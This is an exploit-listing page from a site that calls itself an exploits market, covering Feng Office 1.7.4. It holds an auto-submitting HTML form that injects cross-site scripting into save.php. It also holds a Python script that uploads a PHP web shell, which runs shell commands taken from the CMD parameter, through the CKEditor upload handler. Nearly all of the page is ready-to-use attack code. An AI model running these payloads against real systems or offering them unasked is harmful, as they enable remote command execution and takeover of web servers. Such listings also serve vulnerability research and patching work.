[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Feng Office 1.7.4 - XSS / Arbitrary File Upload Exploit

Author
AutoSec Tools
Risk
[
Security Risk High
]
0day-ID
0day-ID-22783
Category
web applications
Date add
23-10-2014
Platform
php
Source: http://www.securityfocus.com/bid/47049/info
 
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php">
<input type="hidden" name="filename" value=""><script>alert(0)</script>" />
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" />
</form>
</body>
</html>

---------------------------------------------
Feng Office 1.7.4 - Arbitrary File Upload
---------------------------------------------

import socket
 
host = 'localhost'
path = '/feng_community'
shell_path = '/tmp'
port = 80
 
def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)   
 
    s.send('POST ' + path + '/public/assets/javascript/ckeditor/ck_upload_handler.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 195\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')
 
    resp = s.recv(8192)
 
    http_ok = 'HTTP/1.1 200 OK'
     
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded to http://' + host + path + shell_path
 
upload_shell()

#  0day.today [2024-11-15]  #